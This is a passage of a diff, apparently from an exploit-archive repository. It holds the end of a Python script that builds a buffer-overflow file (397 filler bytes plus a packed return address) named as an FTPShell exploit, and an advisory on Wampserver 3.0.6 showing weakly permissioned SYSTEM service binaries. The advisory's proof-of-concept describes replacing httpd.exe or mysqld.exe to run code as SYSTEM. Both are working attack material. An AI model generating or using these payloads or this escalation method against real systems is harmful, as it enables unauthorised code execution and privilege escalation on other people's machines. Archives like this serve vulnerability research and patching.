||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
|
||||
ban+='\n'
|
||||
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
|
||||
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
|
||||
ban+="\x61\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"
|
||||
print ban
|
||||
import struct
|
||||
E = struct.pack("<L",0x00F39658)#JMP to KERNELBA.CloseHandle
|
||||
#397
|
||||
EXp="\x41"*397+E
|
||||
#E2+'\x90'*1+E1+"\x90"*1+E+'\x90'*1+sc
|
||||
|
||||
upfile="Exoploit_ftpshell.csv"
|
||||
file=open(upfile,"w")
|
||||
file.write(EXp)
|
||||
file.close()
|
||||
print 'done:- {}'.format(upfile)
|
80
platforms/windows/local/40967.txt
Executable file
80
platforms/windows/local/40967.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
=====================================================
|
||||
# Vendor Homepage: http://www.wampserver.com/
|
||||
# Date: 10 Dec 2016
|
||||
# Version : Wampserver 3.0.6 32 bit x86
|
||||
# Tested on: Windows 7 Ultimate SP1 (EN)
|
||||
# Author: Heliand Dema
|
||||
# Contact: heliand@cyber.al
|
||||
=====================================================
|
||||
|
||||
Wampserver installs two services called 'wampapache' and 'wampmysqld'
|
||||
with weak file permission running with SYSTEM privileges.
|
||||
This could potentially allow an authorized but non-privileged local user
|
||||
to execute arbitrary code with elevated privileges on the system.
|
||||
|
||||
C:\>sc qc wampapache
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: wampapache
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 3 DEMAND_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME :
|
||||
"c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe" -k runservice
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : wampapache
|
||||
DEPENDENCIES : Tcpip
|
||||
: Afd
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
|
||||
PS C:\> icacls c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe
|
||||
c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe
|
||||
BUILTIN\Administrators:(I)(F) <--- Full Acces
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
NT AUTHORITY\Authenticated
|
||||
Users:(I)(M) <--- Modify
|
||||
|
||||
|
||||
C:\Windows\system32>sc qc wampmysqld
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: wampmysqld
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 3 DEMAND_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME :
|
||||
c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe wampmysqld
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : wampmysqld
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
PS C:\> icacls c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe
|
||||
c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe
|
||||
BUILTIN\Administrators:(I)(F) <--- Full Acces
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
NT AUTHORITY\Authenticated
|
||||
Users:(I)(M) <--- Modify
|
||||
|
||||
|
||||
Notice the line: NT AUTHORITY\Authenticated Users:(I)(M) which lists the
|
||||
permissions for authenticated however unprivileged users. The (M) stands
|
||||
for Modify, which grants us, as an unprivileged user, the ability to
|
||||
read, write and delete files and subfolders within this folder.
|
||||
|
||||
|
||||
====Proof-of-Concept====
|
||||
|
||||
To properly exploit this vulnerability, the local attacker must insert
|
||||
an executable file called mysqld.exe or httpd.exe and replace the
|
||||
original files. Next time service starts the malicious file will get
|
||||
executed as SYSTEM.
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue